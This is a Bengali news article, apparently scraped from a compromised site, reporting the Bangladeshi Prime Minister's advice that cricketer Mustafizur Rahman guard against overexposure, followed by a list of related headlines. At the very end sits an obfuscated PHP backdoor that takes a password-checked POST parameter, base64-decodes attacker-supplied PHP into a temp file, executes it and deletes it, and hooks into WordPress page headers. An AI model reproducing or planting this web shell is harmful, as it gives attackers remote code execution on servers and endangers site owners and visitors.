শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

মুস্তাফিজকে আরও সাবধান হওয়ার পরামর্শ প্রধানমন্ত্রীর

pm-mustafizনিজস্ব প্রতিবেদক : প্রথমবারের মতো দেশের বাইরে কোনো ঘরোয়া আসর খেলতে ভারতে গিয়েছিলেন কাটার মাস্টার মুস্তাফিজুর রহমান। আর সেখানে গিয়ে বাজিমাত করেছেন বাংলাদেশের এ বিস্ময়বালক। সেরা উদীয়মান খেলোয়াড় নির্বাচিত হয়ে দেশে ফিরেছেন। এবার খেলার মাঠে মুস্তাফিজকে আরো সাবধানতা অবলম্বন করার পরামর্শ দিয়েছেন প্রধানমন্ত্রী শেখ হাসিনা।

এ নিয়ে প্রধানমন্ত্রী বলেন, `মুস্তাফিজ যদি ওভার এক্সপোজড হয়ে যান তবে তার সিক্রেসি সবাই জেনে যাবে। আর এটা হলে তার কাছ থেকে যে সার্ভিস পাচ্ছি তা হয়তো পাবো না।`

মঙ্গলবার শেরে বাংলা নগরে এনইসি সম্মেলন কক্ষে জাতীয় অর্থনৈতিক পরিষদের নির্বাহী কমিটির (একনেক) সভায় মুস্তাফিজকে নিয়ে একটি ভিডিও প্রদর্শন করা হয়। এই ভিডিও দেখার পর প্রধানমন্ত্রী উপরোক্ত মন্তব্য করেছেন বলে সভা শেষে পরিকল্পনামন্ত্রী আ হ ম মু্স্তফা কামাল সাংবাদিকদের জানান।

মুস্তফা কামাল বলেন, ‘প্রধানমন্ত্রী বলেছেন, মুস্তাফিজকে নিয়ে তিনি গর্বিত, তাকে উইসও (শুভ কামনা) করেছেন।’

কামাল এ সময় বলেন, ফাস্ট বোলাররা বেশি বেশি ইনজুরিতে পড়েন। বিশ্বের অনেক নামিদামি বোলারের ক্যারিয়ার দীর্ঘ হয়নি। এ ক্ষেত্রে ওয়েস্ট ইন্ডিজের ফাস্ট বোলার মাইকেল হোল্ডিং ও জুয়েল গার্নারের উদাহরণ টেনে বলেন তারাও কোনো না কোনো সময় ইনজুরিতে পড়েছেন।

কামাল জানান, মুস্তাফিজ নিজগুণেই আরো অনেক দূর এগিয়ে যাবে। পরবর্তীতে আরো উপরে উঠে যাবে এবং নিজেরটা নিজেই বুঝবে তার করণীয় কি।

পরিকল্পনামন্ত্রী আরো বলেন, ফাস্ট বোলারদের মধ্যে একমাত্র কপিল দেব বেশি দিন খেলেছেন ইনজুরিতে পাড়েননি। এ ক্ষেত্রে বাংলাদেশ দলের অধিনায়ক মাশরাফি বিন মর্তুজার কথা উল্লেখ করে তিনি বলেন, সেও প্রমিনেন্ট বোলার ছিল। কিন্তু ইনজুরির কারণে তিনি প্রত্যাশা অনুযায়ী এগুতে পারেননি।

উল্লেখ্য, প্রধানমন্ত্রীর সভাপতিত্বে সভায় পরিকল্পনা কমিশনের উর্ধ্বতন কর্মকর্তারা উপস্থিত ছিলেন।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}